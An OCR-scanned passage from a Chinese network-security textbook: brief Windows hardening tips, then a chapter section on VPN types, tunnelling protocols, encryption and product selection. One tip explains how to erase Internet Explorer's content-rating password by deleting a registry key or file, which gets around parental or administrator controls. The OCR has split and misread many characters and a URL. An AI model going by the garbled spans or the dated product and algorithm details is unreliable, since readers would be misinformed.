有 些 时 候 ， 我 们 的 下 会 被 人 修改 为 设 有 分 级 审查 口令 ， 一 旦 被 设置 了 分 级 审查 口令 ， 
即使 重新 安装 正 也 是 没有 用 的 。 怎 么 办 呢 ? 难道 要 格式 化 硬盘 ? 千 万 不 要 ! 这 里 有 一 个 好 
办 法 ， 帮 您 解决 该 问题 。 

进入 注册 表 ， 找 到 HKEY_ LOCAL MACHINE\Software\Microsoft\Windows\Current- 
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Versionpolicies\Ratings， 这 里 有 一 个 名 为 “key” 的 主键 ， 这 就 是 您 设置 的 分 级 审查 口令 ， 
直接 将 它 删 除 即 可 。 重 新 启动 之 后 ， 选择“ 工具” |“Internet 选项 ” |“ 内 容 ”| “分 级 审查 ”， 
您 会 发 现 分 级 审查 口令 已 经 被 复位 了 。 现 在 您 只 要 输入 新 的 分 级 审查 口令 即 可 。 

如 果 你 用 的 是 Windows 9x 则 更 简单 了 ， 到 C: \Windows\system 目录 里 找到 rating.pol 
文件 ， 要 注意 这 是 一 个 隐藏 文件 ， 直 接 将 它 删除 就 可 以 解决 问题 了 。 

7. 预防 网 页 恶意 代码 

许多 恶意 网 页 为 防止 有 人 查看 其 代码 内 容 ， 采 取 了 各 种 各 样 的 方法 以 防止 我 们 查看 其 
源 代码 。 然 而 ， 他 们 的 一 切 努 力 都 是 白费 心机 。 因 为 用 如 下 的 方法 可 以 轻易 地 查看 其 源 代 
码 。 只 要 在 正 地 址 栏 中 输入 View-Source: URL 即 可 。 举 个 例子 ， 你 想 查 看 安防 快 线 网 站 
http://www.juntuan.net 的 源 代 码 ， 只 要 在 正 地 址 栏 中 输入 : View-Source:http : 
Wwwwjuntuan net， 稍 等 一 下 就 会 弹出 一 个 窗口 ， 里 面 就 是 你 想 看 到 的 网 页 源 代 码 。 

8. 禁用 远程 注册 表 服 务 

例如 使 用 Windows 2000/XP 的 用 户 ， 可 以 通过 禁用 “远程 注册 表 服务 ”来 阻挡 部 分 亚 
意 脚本 .具体 方法 是 : 在 “控制 面板 ”一 “管理 工具 ”一 “服务 ”中 右 击 Remote Registry Service， 
在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ， 打 开 属性 对 话 框 ， 在 General 内 将 Startup type 设 
为 Disabled。 这 样 也 可 以 拦截 部 分 的 恶意 脚本 程序 。 


9. 安装 杀毒 软件 和 防火 墙 软件 

对 于 所 有 用 户 ， 都 建议 安装 具有 实时 监控 功能 并 且 可 在 线 更 新 的 杀毒 软件 和 个 人 防火 
堵 ， 如 瑞星 、 金 山 、 诺 顿 等 ， 并 做 到 定期 升级 、 更 新 病毒 库 ， 定 时 扫描 系统 。 对 移动 存储 
设备 的 使 用 ， 务 必 做 到 : 先 查 毒 ， 再 打开 。 
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随 着 网 络 的 日 益 发 展 ， 电 信 、 网 通 、 铁 通 带 区 的 跨 入 连接 方式 各 异 及 相关 费用 的 提高 ， 
恶意 用 户 与 网 络 病毒 、 木 马 增多 ， 很 大 程度 上 给 中 、 小 型 企业 带 来 了 网 络 弊 端 。 如 何 能 让 公司 
的 计算 机 畅快 地 游行 于 网 络 中 ， 这 样 VPN 虚拟 网 络 专线 计划 就 提 上 了 普通 企业 的 议程 。 


8.4.1 VPN 概述 


1. VPN 的 定义 


虚拟 专用 网 (VPN) 被 定义 为 通过 一 个 公用 网 络 (通常 是 因特网 ) 建 立 一 个 临时 的 、 安 全 的 
连接 ， 是 一 条 穿 过 混乱 的 公用 网 络 的 安全 、 稳 定 的 隧道 。 虚 拟 专用 网 是 对 企业 内 部 网 的 扩展 。 

VPN 对 用 户 透明 ， 用 户 感 觉 不 到 其 存在 ， 就 好 像 使 用 了 一 条 专用 线路 在 自己 的 计算 机 
和 远程 的 企业 内 部 网 络 之 间 ， 或 者 在 两 个 异地 的 内 部 网 络 之 间 建 立 连 接 ， 以 进行 数据 的 安 
全 传输 。 虽然 VPN 建立 在 公共 网 络 的 基础 上 , 但 是 用 户 在 使 用 VPN 时 感觉 如 同 在 使 用 专 
用 网 络 进行 通信 ， 所 以 称 为 “虚拟 ”专用 网 络 ， 如 图 8-26 所 示 。 
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虚拟 专用 网 可 以 帮助 远程 用 户 、 公 司 分 支 机 构 、 商 业 伙伴 及 供应 商 同 公司 的 内 部 网 建 
立 可 信 的 安全 连接 ， 并 保证 数据 的 安全 传输 。 虚 拟 专 用 网 可 用 于 不 断 增长 的 移动 用 户 的 全 
球 因 特 网 接 入 ， 以 实现 安全 连接 ， 可 用 于 实现 企业 网 站 之 间 安 全 通信 的 虚拟 专用 线路 ; 用 
于 经 济 有 效 地 连接 到 商业 伙伴 和 用 户 的 安全 外 联网 虚拟 专用 网 。 

2. VPN 的 功能 


虚拟 专用 网 至 少 应 能 提供 如 下 功能 。 

se ”加 密 数据 : 以 保证 通过 公 网 传输 的 信息 即使 被 他 人 截获 也 不 会 泄露 。 

。 ”信息 认证 和 身份 认证 : 保证 信息 的 完整 性 、 合 法 性 ， 并 能 鉴别 用 户 的 身份 。 
e ”提供 访问 控制 : 不 同 的 用 户 有 不 同 的 访问 权限 。 

3. VPN 的 分 类 


根据 VPN 所 起 的 作用 , 可 以 将 VPN 分 为 三 类 : VPDN、 Intranet VPN 和 Extranet VPN。 

1) VPDN(Virtual Private Dial Network) 

在 远程 用 户 或 移动 雇员 和 公司 内 部 网 之 问 的 VPN， 称 为 VPDN。 实 现 过 程 如 下 用 户 
拨号 NSP( 网 络 服务 提供 商 ) 的 网 络 访问 服务 器 NAS(Network Access ServeD)， 发 出 PPP 连接 
请 求 ，NAS 收 到 呼叫 后 ， 在 用 户 和 NAS 之 间 建 立 PPP 链 路 。 然 后 ，NAS 对 用 户 进行 身份 
验证 ， 确 定 是 合法 用 户 ， 就 启动 VPDN 功能 ， 与 公司 总 部 内 部 连接 ， 访 问 其 内 部 资源 。 

2) Intranet VPN 

这 是 在 公司 远程 分 支 机 构 的 LAN 和 公司 总 部 LAN 之 间 的 VPN。 通 过 Internet 这 一 公 
共 网 络 将 公司 在 各 地 分 支 机 构 的 LAN 连 到 公司 总 部 的 LAN， 以 便 公司 内 部 的 资源 共享 、 
文件 传递 等 ， 可 节省 DDN 等 专线 所 带 来 的 高 额 费用 。 

3) Extranet VPN 

这 是 在 供应 商 、 商 业 合 作 伙伴 的 LAN 和 公司 的 LAN 之 间 的 VPN。 由 于 不 同 公司 网 络 
环境 的 差异 性 ， 该 产品 必须 能 兼容 不 同 的 操作 平台 和 协议 。 由 于 用 户 的 多 样 性 ， 公 司 的 网 
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络 管理 员 还 应 该 设置 特定 的 访问 控制 表 ACL(Access Control List)， 根 据 访问 者 的 身份 、 网 
络 地 址 等 参数 来 确定 相应 的 访问 权限 ， 开 放 部 分 资源 而 非 全 部 资源 给 外 联网 的 用 户 。 

4. VPN 典型 应 用 

企业 用 户 对 于 VPN 网 络 的 应 用 需求 最 典型 的 有 以 下 三 种 。 

1) “通过 Internet 实现 远程 用 户 访问 

虚拟 专用 网 络 支持 以 安全 的 方式 通过 公共 互联 网 络 远程 访问 企业 资源 。 与 使 用 专线 拨 
打 长 途 或 市 话 连接 企业 的 网 络 接 入 服务 器 (NAS) 不 同 , 虚拟 专用 网 络 用 户 首 先 拨 通 本 地 ISP 
的 NAS， 然 后 VPN 软件 利用 与 本 地 ISP 建立 的 连接 在 拨号 用 户 和 企业 VPN 服务 器 之 间 
创建 一 个 跨越 Internet 或 其 他 公共 互联 网 络 的 虚拟 专用 网 络 ， 如 图 8-27 所 示 。 
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图 8-27 通过 Internet 实现 远程 用 户 访问 


2) 通过 Internet 实现 远程 网 络 互联 

使 用 专线 连接 的 分 支 机 构 和 企业 局 域 网 不 需要 使 用 价格 昂贵 的 长 距离 专用 线路 ， 分 支 
机 构 和 企业 端 路 由 器 可 以 各 自 使 用 本 地 的 专用 线路 , 通过 本 地 的 ISP 连通 Internet。VPN 软 
件 使 用 与 本 地 ISP 建立 的 连接 和 TInternet 网 络 在 分 支 机 构 和 企业 端 路 由 器 之 间 创 建 一 个 虚拟 
专用 网 络 ， 如 图 8-28 所 示 。 

3) ”连接 企业 内 部 网 络 计算 机 

在 企业 的 内 部 网 络 中 ， 考 虑 到 一 些 部 门 可 能 存储 有 重要 数据 ， 为 确保 数据 的 安全 性 ， 
传统 的 方式 只 能 把 这 些 部 门 同 整个 企业 网 络 断 开 形成 孤立 的 小 网 络 。 这 样 做 虽然 保护 了 部 
门 的 重要 信息 ， 但 是 由 于 物理 上 的 中 断 ， 使 其 他 部 门 的 用 户 无 法 与 之 连接 ， 造 成 通信 上 的 
困难 。 

采用 VPN 方案 , 通过 使 用 一 台 VPN 服务 器 既 能 够 实现 与 整个 企业 网 络 的 连接 ， 又 可 
以 保证 保密 数据 的 安全 性 。 使 用 VPN 服务 器 后 ， 企 业 网 络 管理 人 员 通 过 VPN 服务 器 ,可 
指定 只 有 符合 特定 身份 要 求 的 用 户 才能 连接 VPN 服务 器 ， 获 得 访问 敏感 信息 的 权限 。 此 
外 ， 还 可 以 对 所 有 VPN 数据 进行 加 密 ， 从 而 确保 数据 的 安全 性 。 没 有 访问 权 的 用 户 无 法 
看 到 部 门 的 局 域 网 ， 如 图 8-29 所 示 。 
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8.4.2 VPN 的 关键 安全 技术 

VPN 技术 非常 复杂 ， 它 涉及 通信 技术 、 密 码 技术 和 现代 认证 技术 ， 是 一 项 交叉 科学 。 
目前 ，VPN 主要 包含 三 种 技术 : 隧道 技术 、 加 密 认证 技术 和 QoS 技术 。 

1. 隧道 技术 

隧道 技术 的 基本 过 程 是 在 源 局 域 网 与 公 网 的 接口 处 将 数据 (可 以 是 ISO 七 层 模型 中 的 
数据 链 路 层 或 网 络 层 数据 ) 作 为 负载 封装 在 一 种 可 以 在 公 网 上 传输 的 数据 格式 中 , 在 目的 局 
域 网 与 公 网 的 接口 处 将 数据 解 封装 ， 取 出 负载 。 被 封装 的 数据 包 在 互联 网 上 传递 时 所 经 过 
的 逻辑 路 径 称 为 “隧道 ”。 

要 使 数据 顺利 地 被 封装 、 传 送 及 解 封装 , 通信 协议 是 保证 其 实现 的 核心 。 目 前 VPN 隧 
道 协议 有 四 种 : 点 到 点 隧道 协议 PPTP、 第 二 层 隧道 协议 L2TP、 网 络 层 隧道 协议 IPSec 以 
及 Socks v5。 它 们 在 OSI 七 层 模型 中 的 位 置 如 表 8-3 所 示 。 各 协议 工作 在 不 同 层次 ， 不 同 
的 网 络 环 境 需 要 不 同 的 协议 ， 在 选择 VPN 产品 时 ， 应 该 注意 。 
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表 8-3 隧道 协议 在 OSI 中 的 位 置 


OSI 七 层 参考 模型 加 密 认 证 技术 安全 协议 
应 用 层 
应 用 代理 
表示 层 
会 话 层 
会 话 代理 Socks v5 
传输 层 代 : CKS V. 
网 络 层 IPSec 
数据 链 路 层 包 过 滤 PPTP/L2F/L2TP 
物理 层 


1) 点 到 点 隧道 协议 一 一 PPTP 

PPTP 协议 将 控制 包 与 数据 包 分 开 ， 控 制 包 采用 TCP 控制 ， 用 于 严格 的 状态 查询 及 信 
令 信 息 ; 数据 包 部 分 先 封装 在 PPP 协议 中 ， 然 后 封装 到 GRE V2 协议 中 。 目 前 ，PPTP 协 
议 已 基本 被 淘汰 ， 不 再 使 用 在 VPN 产品 中 。 

2) ”第 二 层 隧道 协议 一 一 L2TP 

L2TP 是 国际 标准 隧道 协议 , 它 结合 了 PPTP 协议 以 及 第 二 层 转 发 L2F 协议 的 优点 , 能 
以 隧道 方式 使 PPP 包 通 过 各 种 网 络 协议 ， 包 括 ATM、SONET 和 帧 中 继 。 但 是 L2TP 没有 
任何 加 密 措施 ， 一 般 是 和 IPSec 协议 结合 使 用 ， 提 供 隧道 验证 。 

3) IPSec 协议 

IPSec 协议 是 一 个 范围 广泛 、 开 放 的 VPN 安全 协议 ， 工 作 在 OSI 模型 中 的 第 三 层 一 一 
网 络 层 。 它 提供 所 有 在 网 络 层 上 的 数据 保护 和 透明 的 安全 通信 。IPSec 协议 可 以 在 两 种 模式 
下 运行 : 一 种 是 隧道 模式 ， 一 种 是 传输 模式 。 在 隧道 模式 下 ，IPSec 把 IPv4 数据 包 封装 在 
安全 的 瑟 帧 中 。 传输 模式 是 为 了 保护 端 到 端的 安全 性 , 不 会 隐藏 路 由 信息 。1999 年 底 , IETF 
安全 工作 组 完成 了 IPSec 的 扩展 ， 在 IPSec 协议 中 加 上 了 ISAKMP 协议 ， 其 中 还 包括 密 钥 
分 配 协议 下 E 和 Oakley。 

-种 趋势 是 将 L2TP 和 IPSec 结合 起 来 ， 用 L2TP 作为 隧道 协议 ， 用 IPSec 协议 保护 数 

据 。 目 前 ， 市 场 上 大 部 分 VPN 采用 这 类 技术 。 

优点 : 它 定义 了 一 套用 于 保护 私有 性 和 完整 性 的 标准 协议 , 可 确保 运行 在 TCP/IP 协议 
上 的 VPN 之 间 的 互 操 作 性 。 

缺点 : 除了 包 过 滤 外 ， 它 没有 指定 其 他 访问 控制 方法 ， 对 于 采用 NAT 方式 访问 公共 网 
络 的 情况 难以 处 理 。 

适用 场合 : 最 适合 可 信 LAN 到 LAN 之 间 的 VPN。 

4) Socks v5 协议 

Socks v5 工作 在 OSI 模 型 中 的 第 五 层 一 一 会 话 层 , 可 作为 建立 高 度 安全 的 VPN 的 基础 。 
Socks v5 协议 的 优势 在 访问 控制 , 因此 适用 于 安全 性 较 高 的 VPN。Socks v5 已 被 IETF 建议 
作为 建立 VPN 的 标准 。 

优点 : 非常 详细 的 访问 控制 。 在 网 络 层 只 能 根据 源 目的 地 的 他 地 址 允许 或 拒绝 通过 ， 
在 会 话 层 控制 手段 更 多 一 些 ， 因 为 工作 在 会 话 层 ， 能 同 低层 协议 如 IPv4、IPSec、PPTP、 
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L2TP 一 起 使 用 。 用 Socks v5 的 代理 服务 器 可 隐藏 网 络 地 址 结构 ， 能 为 认证 、 加 密 和 密 钥 
管理 提供 “插件 ”模块 ， 让 用 户 自 由 地 采用 所 需要 的 技术 。Socks v5 可 根据 规则 过 滤 数据 
流 ， 包 括 Java Applet 和 Actives 控制 。 

缺点 : 其 性 能 比 低层 协议 差 ， 必 须 制定 更 复杂 的 安全 管理 策略 。 

适用 场合 : 最 适合 用 于 客户 机 到 服务 器 的 连接 模式 ， 适 用 于 外 部 网 VPN 和 远程 访问 
VPN。 


2. 加 密 认 证 技术 


VPN 是 在 不 安全 的 Internet 中 通信 ,通信 的 内 容 可 能 涉及 企业 的 机 密 数 据 ， 因 此 其 安 
全 性 非常 重要 。VPN 中 的 安全 技术 通常 由 加 密 、 认 证 及 密 钥 交换 与 管理 组 成 。 

1) ”认证 技术 

认证 技术 防止 数据 的 伪造 和 被 自 改 ， 它 采用 一 种 称 为 “摘要 ”的 技术 。“ 摘 要 ”技术 
主要 采用 Hash 函数 将 一 段 长 的 报 文通 过 函数 变换 , 映射 为 一 段 短 的 报 文 即 摘要 。 由 于 Hash 
函数 的 特性 ,两 个 不 同 的 报 文具 有 相同 的 摘要 几乎 是 不 可 能 的 。 该 特性 使 得 摘要 技术 在 VPN 
中 有 两 个 用 途 : 验证 数据 的 完整 性 、 用 户 认 证 。 

2) 加 密 技 术 

IPSec 通过 ISAKMP/IKE/Oakley 协商 确定 几 种 可 选 的 数据 加 密 算法 ， 如 DES、3DES 
等 。DES 密 钥 长 度 为 56 位 ， 容 易 被 破译 ，3DES 使 用 三 重 加 密 增加 了 安全 性 。 当 然 国外 还 
有 更 好 的 加 密 算法 ， 但 国外 禁止 出 口 高 位 加 密 算法 。 基 于 同样 理由 ， 国 内 也 禁止 重要 部 门 
使 用 国外 算法 。 国 内 算法 不 对 外 公开 ， 被 破解 的 可 能 性 极 小 。 

3) ” 密 钥 交换 和 管理 

VPN 中 密 钥 的 分 发 与 管理 非常 重要 。 密 钥 的 分 发 有 两 种 方法 : 一 种 是 通过 手工 配置 的 
方式 ， 另 一 种 采用 密 钥 交换 协议 动态 分 发 。 手 工 配置 的 方法 由 于 密 钥 更 新 困难 ， 只 适合 于 
简单 网 络 的 情况 。 密 钥 交 换 协 议 采用 软件 方式 动态 生成 密 铀 ， 适 合 于 复杂 网 络 的 情况 且 密 
钥 可 快速 更 新 ， 可 以 显著 提高 VPN 的 安全 性 。 目 前 主要 的 密 钥 交换 与 管理 标准 有 IKE ( 互 
联网 密 钥 交 换 )、SKIP (互联 网 简单 密 钥 管理 ) 和 Oakley。 


3. QoS 技术 


通过 隧道 技术 和 加 密 技术 ， 已 经 能 够 建立 起 一 个 具有 安全 性 、 互 操作 性 的 VPN。 但 是 
该 VPN 性 能 上 不 够 稳定 ， 管 理 上 不 能 满足 企业 的 要 求 ， 这 就 要 加 入 QoS 技术 。 实 行 QoS 
应 该 在 主机 网 络 中 , 即 VPN 所 建立 的 隧道 这 一 段 ， 这 样 才能 建立 一 条 性 能 符合 用 户 要 求 的 
隧道 。 

不 同 的 应 用 对 网 络 通信 有 不 同 的 要 求 ， 这 些 要 求 可 用 以 下 参数 体现 。 

。 带宽: 网 络 提供 给 用 户 的 传输 率 。 

e ”反应 时 间 : 用 户 所 能 容忍 的 数据 包 传递 延 时 。 

。 ” 拌 动 : 延 时 的 变化 。 

。 丢失 率 : 数据 包 丢失 的 比率 。 
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8.4.3 VPN 产品 及 解决 方案 


面 对 市 场 上 众多 的 VPN 产品 ,网 络 专业 知识 略 显 不 足 的 企业 常常 显得 很 茫然 , 不 知 如 
何 选择 适合 自己 企业 的 VPN 产品 。 如 今 大 多 数 中 小 企业 主 们 , 在 企业 信息 化 升级 的 需求 下 ， 
都 希望 能 够 选 购 到 真正 适合 其 企业 的 VPN 产品 和 解决 方案 。 

1. VPN 选 购 要 点 


VPN 产品 的 市 场 正 处 于 高 速 发 展 的 时 期 ， 面 对 国内 外 各 种 品牌 和 类 型 的 VPN 产品 ， 
用 户 的 选择 范围 越 来 越 广 。 但 如 何 选择 真正 适合 自己 企业 所 需要 的 产品 呢 ? 用 户 选 购 时 应 
关注 以 下 五 大 因素 。 

1) ”网 络 环境 

VPN 产品 的 选 购 应 关注 用 户 自 身 的 网 络 环境 对 VPN 产品 的 需求 。 对 于 不 同 的 用 户 ， 
其 网 络 环境 是 多 样 的 ， 包 括 以 下 不 同方 式 。 

。 上 网 方式 的 不 同 : 政府 、 大 型 企业 的 总 部 大 多 会 采用 专线 ， 而 中 型 企业 则 大 多 申 

请 有 固定 地 址 ， 办 事 处 、 小 型 机 构 可 能 多 会 使 用 ADSL 线路 和 宽带 ， 出 差 在 外 地 
的 用 户 ， 其 上 网 方式 更 加 灵活 ， 如 Modem 拨号 、 无 线 网 卡 、GPRS 等 。 这 些 需 求 
决定 了 选 购 的 VPN， 必 须 支 持 多 种 网 络 接 入 方式 。 

e 网络 结构 的 不 同 : 大 多 数 用 户 的 现 有 网 络 中 ， 已 经 部 署 有 各 种 网 络 设备 ， 甚 至 已 

经 部 署 了 很 多 安全 设备 (如 防火 墙 、IDS 等 )。 因 此 ， 选 购 的 VPN 在 接 入 现 有 的 网 
络 环境 后 ， 不 能 影响 原 有 的 网 络 应 用 ， 从 而 选 购 的 VPN 需 支持 多 种 工作 方式 (如 
支持 透明 工作 模式 )、 支 持 NAT 的 穿越 ， 以 及 支持 双边 NAT 等 。 

e。 ”网 络 应 用 的 不 同 : IPSec VPN 有 三 种 典型 的 应 用 模式 ， 即 边界 到 边界 、 端 点 到 边 

界 、 端 点 到 端点 。 只 有 能 够 良好 支持 这 三 种 模式 的 产品 ， 才 可 以 满足 用 户 多 方面 
的 需求 。 另外， 如 果 用 户 的 网 络 应 用 中 含有 语音 或 视频 的 应 用 ， 则 选 购 的 VPN 必 
须 能 够 支持 H.323 协议 ， 同 时 提供 对 关键 应 用 的 带宽 保证 。 

对 网 络 稳定 性 要 求 高 的 用 户 (如 金融 行业 )， 会 要 求 设备 具有 宛 余 备份 的 功能 ， 甚 至 会 
采用 多 链 路 接 入 的 方式 。 因 此 ， 选 购 的 VPN 设备 ， 支 持 双 机 热 备份 ， 以 及 支持 双 链 路 的 元 
余 备 份 ， 就 显得 格外 重要 。 带 有 防火 墙 功能 的 VPN 产品 ， 其 应 用 性 将 更 强 。 

从 以 上 可 以 看 出 ， 网 络 环境 的 复杂 性 要 求 VPN 产品 对 各 种 网 络 具 有 良好 的 适应 性 。 

2) ”技术 特性 

IPSec VPN 主要 是 采用 传输 和 隧道 模式 ,对 数据 流 进行 安全 保护 ,支持 标准 IKE 的 VPN 
产品 ， 与 其 他 厂商 产品 具有 和 良好 的 兼容 性 。 

IPSec VPN 主要 功能 和 技术 特性 包括 : 隧道 协商 中 的 认证 方式 ， 需 要 支持 共享 密 钥 方 
式 或 证 书 方式 ， 支 持 的 软件 算法 中 ， 加 密 算法 多 采用 国际 标准 的 DES、3DES、AES 等 算 
法 ， 认 证 算法 多 采用 国际 通用 的 MD5、SHA-1 等 算法 ; 硬件 算法 则 采用 国家 密码 管理 委员 
会 办 公 室 (简称 国 密 办 ) 批 准 的 加 密 算法 和 加 密 卡 ; 动态 虚拟 地 址 的 分 配 功能 ( 即 DHCP)， 能 
够 为 移动 用 户 动态 分 配 企业 内 部 也; 支持 DDNS 动态 域名 解析 功能 ， 能 方便 用 户 对 动态 地 
址 的 应 用 ; 支持 安全 策略 的 集中 管理 功能 ， 简 化 用 户 的 网 络 管理 和 隧道 管理 ;证 书 的 管理 
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方面 ， 支 持 CA 的 产品 ， 能 够 实现 证 书 的 自动 撤销 、 更 新 ， 以 及 CRL( 证 书 作 废 列表 ) 的 检 
查 ， 具 有 良好 的 维护 性 。 对 于 使 用 语音 、 视 频 的 用 户 ， 服 务 质量 保证 QoS 则 非常 重要 。 

3) ”性 能 指标 

VPN 的 性 能 指标 主要 从 支持 的 最 大 隧道 数 、 明 文 转发 能 力 、 加 密 处 理性 能 这 三 个 方面 
来 考察 。 此 外 ， 如 果 产 品 含有 简单 的 防火 墙 功能 ， 防 火 墙 的 性 能 指标 也 可 以 参考 一 下 。 

目前 市 场 上 的 产品 中 ， 网 关 VPN 支持 的 最 大 并 发 隧道 数 从 1000 一 5000， 甚 至 10000 
不 等 。 明 文 转发 能 力 和 硬件 平台 有 关 ， 一 般 百 兆 端口 的 明文 转发 可 接近 百 兆 。 

各 厂家 的 加 密 处 理性 能 差别 很 大 ， 百 兆 产品 和 千 兆 产品 性 能 差别 则 更 大 ， 很 多 厂商 会 
采用 硬件 加 速 卡 来 提高 产品 的 加 密 性 能 。 如 百 兆 端口 的 VPN 产品 , 采用 国 密 办 批准 的 加 密 
卡 ， 一 般 性 能 可 达 50Mb/s 以 上 。 

区” 管理 能 力 

VPN 使 用 户 的 网 络 管理 功能 ， 从 局 域 网 延伸 到 了 公共 网 。 网 络 管理 任务 的 复杂 性 增加 
了 ， 因 此 必须 选择 使 用 简单 、 管 理 完善 的 产品 。 

业界 普遍 遵循 的 管理 原则 是 : 可 操作 性 强 、 能 够 减 小 网 络 风险 、 具 有 高 扩展 性 、 经 济 
性 、 高 可 靠 性 等 优点 。 

- 般 VPN 的 管理 主要 包括 设备 管理 、 安 全 管理 、 配 置 管理 、 访 问 控制 列表 管理 、QoS 
管理 、 用 户 管理 、 证 书 管理 等 内 容 。 

5) 厂商 的 技术 支持 服务 

用 户 购买 了 产品 ， 在 使 用 中 必定 会 遇 到 问题 ， 会 有 新 的 需求 ， 因 此 选择 服务 良好 的 厂 
家 ,也 是 选择 产品 时 必须 考虑 的 。 选 择 时 一 般 主 要 是 看 厂商 是 否 提供 电话 支持 和 在 线 支持 ， 
是 否 提供 产品 的 安装 、 配 置 及 使 用 服务 。 尤 其 是 在 用 户 遇 到 困难 时 ， 是 否 能 及 时 响应 和 快 
速 解决 。 

总 之 ， 从 多 个 方面 去 了 解 各 厂家 VPN 的 产品 ,互相 比 较 ， 从 中 选择 出 真正 能 够 满足 自 
己 所 需求 的 产品 。 

2. 企业 构建 VPN 的 解决 方案 

企业 构建 VPN 系统 要 涉及 很 多 因素 , 需要 结合 自身 应 用 需求 与 发 展 ， 以 及 客观 环境 提 
供 的 条 件 ， 以 安全 、 经 济 、 实 用 、 可 靠 和 高 效 为 原则 ， 制 定 解 决 方案 。 

企业 构建 VPN 时 , 既 可 以 选择 硬件 VPN 方案 , 也 可 以 选择 软件 VPN 方案 。 由 于 VPN 
的 加 密 传输 机 制 需要 消耗 系统 性 能 ， 硬 件 VPN 将 加 密 和 解密 置 于 高 速 的 硬件 中 ， 提 供 了 
较 好 的 性 能 。 硬件 VPN 可 以 提供 强大 的 物理 和 逻辑 安全 ,更 好 地 防止 了 非法 入 侵 ， 同 时 配 
置 和 操作 也 更 为 简单 。 一 般 情况 下 ， 硬 件 方案 的 价格 比较 高 。 对 于 中 小 型 网 络 应 用 来 说 ， 
如 果 网 络 规模 不 大 ， 最 好 选择 面向 中 小 企业 或 小 型 办 公 室 的 VPN 产品 。 

1) VPN 硬件 方案 

可 选 的 VPN 硬件 产品 主要 有 带 有 VPN 功能 的 防火 墙 、 路 由 器 或 专用 VPN 硬件 设备 。 

在 防火 墙 中 集成 VPN 是 比较 流行 的 解决 方案 ， 许 多 企业 网 络 都 通过 防火 墙 来 连接 
Internet。 让 防火 墙 直接 支持 VPN 是 一 种 不 错 的 选择 , 这 样 可 以 将 防火 墙 的 安全 策略 和 VPN 
隧道 控制 结合 起 来 ， 便 于 集中 管理 。 但 这 种 组 合 应 用 可 能 会 影响 性 能 ， 因 为 加 密 处 理 的 系 
统 开销 比较 大 。 路 由 器 是 一 种 最 常用 的 网 络 边 界 设备 ， 在 路 由 器 上 集成 VPN 也 比较 实用 。 
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只 是 与 基于 防火 墙 的 VPN 相 比 ， 总 体 安全 性 要 差 一 些 。 也 有 许多 防火 墙 和 路 由 器 不 集成 
VPN 功能 ， 这 就 需要 选择 专用 的 VPN 产品 。 

随 着 中 小 企业 信息 化 程度 的 提高 和 宽带 网 的 兴起 , VPN 不 再 是 大 型 企业 的 专利 , 越 来 
越 多 的 中 小 企业 需要 采用 VPN 技术 实现 局 域 网 远程 互联 和 远程 用 户 的 接 入 访问 。 许 多 厂 
商都 针对 中 小 企业 或 大 型 企业 分 支 机 构 提 供 了 高 性 价 比 的 VPN 产品 。 

此 类 VPN 产品 多 为 集成 VPN 的 防火 墙 、VPN 路 由 器 , 有 时 称 为 “安全 路 由 器 ”或 “ 访 
问 路 由 器 ”， 性 价 比 非常 高 ， 且 支持 多 种 宽带 接 入 方式 ， 还 提供 方便 的 管理 工具 ， 支 持 主 
流 的 VPN 协议 。 例如 ,Cisco 1700 系列 访问 路 由 器 、Netgear FVL328、NetScreen-50、Vigor 
系列 路 由 器 。 许 多 VPN 产品 还 支持 动态 IP 地 址 接 入 方式 ， 对 于 采用 ADSL 连接 的 许多 
中 小 型 企业 非常 有 用 。 

2) ”VPN 软件 方案 

软件 VPN 方案 的 价格 低廉 , 且 更 具 灵 活性 , 如 提供 更 加 方便 的 用 户 管理 , 便于 升级 等 。 

但 是 ， 在 性 能 、 安 全 性 、 可 靠 性 以 及 安装 和 管理 的 便捷 性 等 方面 ， 软 件 方案 都 不 如 硬 
件 方案 。 软 件 VPN 方案 适用 于 安全 要 求 相 对 较 低 、 规 模 较 小 的 网 络 ， 能 满足 许多 中 小 企 
业 的 联网 业务 需求 。 基 于 软件 的 产品 很 多 ， 从 单一 的 IPSec 软件 到 现 有 路 由 器 、 网 关 和 防 
火 墙 中 的 各 种 数据 封装 产品 。 软 件 VPN 一 般 都 采用 Windows 操作 系统 设计 也 就 是 桌面 办 
公 系 统 ， 如 果 采 用 Windows Sever 系统 ， 则 需要 消耗 大 量 的 硬件 资源 。 

软件 VPN 采用 Windows 系统 作为 系统 的 根基 , 其 可 靠 性 取决 于 安装 这 个 软件 的 PC 机 。 
这 在 一 定 程度 上 说 明了 软件 VPN 的 可 靠 性 是 不 可 控制 的 。 而 且 依赖 于 Windows 系统 ， 系 
统 其 他 软件 导致 的 冲突 或 者 资源 占用 的 情况 也 会 对 VPN 的 可 靠 性 带 来 影响 。Windows 除 
内 核 外 还 包括 用 户 界面 (UD 以 及 大 量 的 应 用 软件 ， 这 些 大 量 的 软件 、GUI 等 都 有 可 能 导致 
更 多 的 Windows 技术 漏洞 。 

实际 上 目前 许多 中 小 型 VPN 解决 方案 都 是 软 硬 件 相 结合 的 ， 以 现 有 网 络 设备 为 基础 ， 
再 配 以 适当 的 VPN 软件 来 实现 VPN。 

3. 微软 的 VPN 解决 方案 介绍 

在 纯 软 件 VPN 解决 方案 中 ， 最 为 常见 的 就 是 微软 的 解决 方案 。 微 软 最 早 在 其 网 络 操 
作 系统 Windows NT Server 4.0 中 引入 PPTP。 首 次 推出 的 PPTP 虽然 出 现 了 严重 的 安全 问题 ， 
但 问题 并 非 源 于 PPTP 协议 本 身 ， 而 是 微软 对 这 个 协议 的 实现 有 许多 缺陷 。 

微软 对 此 进行 重新 修改 后 ， 接 着 推出 了 路 由 与 远程 访问 服务 (简称 RRAS)， 作 为 
Windows NT Server 4.0 的 免费 组 件 ， 进 一 步 完 善 了 PPTP 协议 的 实现 方案 ， 支 持 请 求 拨号 
路 由 ， 并 提供 基于 图 形 界面 的 管理 工具 。 

微软 的 Windows 2000/2003 则 集成 了 路 由 和 远程 访问 服务 ， 不 再 局 限于 微软 自己 的 标 
准 ， 而 是 全 面 支持 下 TF 标准 ， 包 括 主流 的 VPN 解决 方案 L2TP 和 IPSec， 可 实现 跨 平台 
的 VPN 组 网 方案 。 

在 Windows 2000/2003 服务 器 版 本 中 ， 已 将 PPTP 和 L2TP 服务 器 都 纳入 路 由 和 远程 
访问 服务 组 件 进行 统一 配置 和 管理 ， 使 得 实现 VPN 方案 变 得 更 加 容易 。Windows 2000/XP 
的 了 PSec 基于 策略 进行 配置 和 管理 ， 支 持 传输 模式 和 隧道 模式 。 当 然 ， 最 新 的 网 络 操作 系 
